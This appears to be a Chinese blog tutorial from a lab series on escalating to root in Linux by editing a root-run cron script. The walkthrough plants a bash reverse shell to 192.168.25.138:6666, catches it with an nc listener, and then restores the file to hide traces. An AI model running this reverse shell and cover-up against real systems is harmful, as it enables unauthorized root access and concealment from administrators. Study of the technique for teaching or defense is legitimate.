当前位置: 首页 > news >正文

Linux提权之计划任务反弹shell提权(十一)

实验环境还是一样的

当获取一个linux普通用户的时,查看计划任务

首先我们退出root用户

cat /etc/crontab

crontab -l

查看当前用户命令

/var/spool/cron/crontabs/root

这个目录是root任务文件 默认是不是root权限是 看不到

tail -f /var/log/syslog

咋们切换用户web1

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

然后复制一份文件 到tmp目录 用于修改回来

cp /script/cleanup.py /tmp/cleanup.py

然后我们修改

/script/cleanup.py

这个.py文件

bash -i >& /dev/tcp/192.168.25.138/6666 0>&1

然后在kail新建窗口 开启监听

nc -lvnp 6666

等待计划任务执行

现在返回shell

root

提权成功

然后我们消除痕迹 我们把原来的文件修改回来 就好了

相关文章:

  • 【Viewer.js】vue3封装图片查看器
  • 【时时三省】(C语言基础)结构化程序设计方法
  • 二:前端发送POST请求,后端获取数据
  • Java并发 ThreadLocal 原理(详解)
  • c++中,什么时候应该使用mutable关键字?
  • Bash Shell控制台终端命令合集
  • C语言番外篇(3)------------>break、continue
  • 论文笔记:Autonomy-of-Experts Model
  • watchEffect 里有响应式依赖时并没有自动追踪
  • C++关键字之mutable
  • Tesseract OCR:起源、发展与完整使用指南
  • 多线程篇学习面试
  • 请谈谈 Vue 中的 key 属性的重要性,如何确保列表项的唯一标识?
  • 设计模式Python版 中介者模式
  • Vue 3 + Vite 项目中配置代理解决开发环境中跨域请求问题
  • Linux系统管理与编程01:准备工作
  • vim 多个关键字高亮插件介绍
  • A. Jagged Swaps
  • mybatis从接口直接跳到xml的插件
  • 不同activity的mViewModel是复用同一个的还是每个activity都是创建新的ViewModel
  • 政治局会议:创设新的结构性货币政策工具,设立新型政策性金融工具,支持科技创新、扩大消费、稳定外贸等
  • 外卖口水战四天,京东美团市值合计蒸发超千亿港元
  • 4500万失能人员如何养老?没参保是否能享受长护师服务?
  • 云南富源回应“岔河水库死鱼”事件: 初步研判与水体缺氧有关
  • “两高”发布侵犯知产犯罪司法解释:降低部分犯罪入罪门槛
  • “下一个高增长市场,还是中国”,龚正市长会见参加上海车展的国际企业高管